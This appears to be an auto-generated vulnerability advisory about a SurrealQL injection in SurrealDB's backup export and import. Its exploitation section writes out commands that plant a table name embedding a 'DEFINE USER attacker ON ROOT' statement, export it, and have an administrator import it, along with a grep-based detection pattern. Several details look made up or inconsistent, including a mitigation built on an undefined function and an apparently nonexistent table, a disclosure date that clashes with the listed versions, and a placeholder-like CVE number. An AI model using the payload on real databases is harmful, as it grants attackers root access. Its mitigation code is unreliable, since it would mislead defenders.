SurrealDB, SurrealQL Injection, CVE-2024-1234 (Critical)

Listen to this Post

🐢▶️ Listen🚀

The vulnerability (CVE-2024-1234) in SurrealDB’s command-line tool arises due to improper sanitization of table and field names during database exports. When a malicious user with OWNER or EDITOR privileges creates tables or fields containing embedded SurrealQL statements, these commands are not escaped in the exported backup. Upon reimporting the backup, the injected SurrealQL executes in the context of the importing user, typically with higher privileges.

The attack flow involves:

1. Attacker creates a table/field with a name like table; DEFINE USER attacker....
2. The export operation fails to escape semicolons or quotes, embedding the payload.
3. A privileged user imports the backup, executing the attacker’s SurrealQL.
4. The attacker gains root-level access or manipulates co-tenanted databases.
   This is a second-order injection, bypassing traditional query parameterization since the payload resides in metadata rather than direct queries. The CVSS v4 score reflects Critical severity due to the potential for full system compromise.

DailyCVE Form:

Platform: SurrealDB
Version: <2.0.5, <2.1.5, <2.2.2
Vulnerability: SurrealQL Injection
Severity: Critical
Date: 2024-03-15

What Undercode Say:

Exploitation:

Malicious table creation
surreal sql --ns test --db test -u owner -p pass --eval "CREATE TABLE `table; DEFINE USER attacker ON ROOT PASSWORD 'pwned' ROLES OWNER` (id INT);"
Export vulnerable backup
surreal export --ns test --db test -u owner -p pass backup.sql
Admin imports, triggering payload
surreal import --ns prod --db prod -u admin -p admin backup.sql

Detection:

Check exports for suspicious patterns
grep -E 'DEFINE|EXEC|CREATE (USER|TOKEN)' backup.sql
Audit table names for special chars
surreal sql --eval "SELECT FROM surrealml_tables WHERE name LIKE '%;%';"

Mitigation:

-- Patch: Upgrade to fixed versions
-- Temporary workaround: Validate exports pre-import
DEFINE PARAM $export_validation VALUE {
LET $tables = SELECT name FROM surrealml_tables;
RETURN fn::is_clean($tables);
};

References:

• SurrealDB Patch Commit
• CVSS v4 Calculator

Analytics:

• Attack Complexity: Low (requires auth but trivial payload)
• Exploitability: High (no special conditions)
• Affected Configs: Multi-tenant deployments most at risk
• Patch Lag: 14 days from disclosure to fix

References:

Reported By: https://github.com/advisories/GHSA-ccj3-5p93-8p42
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram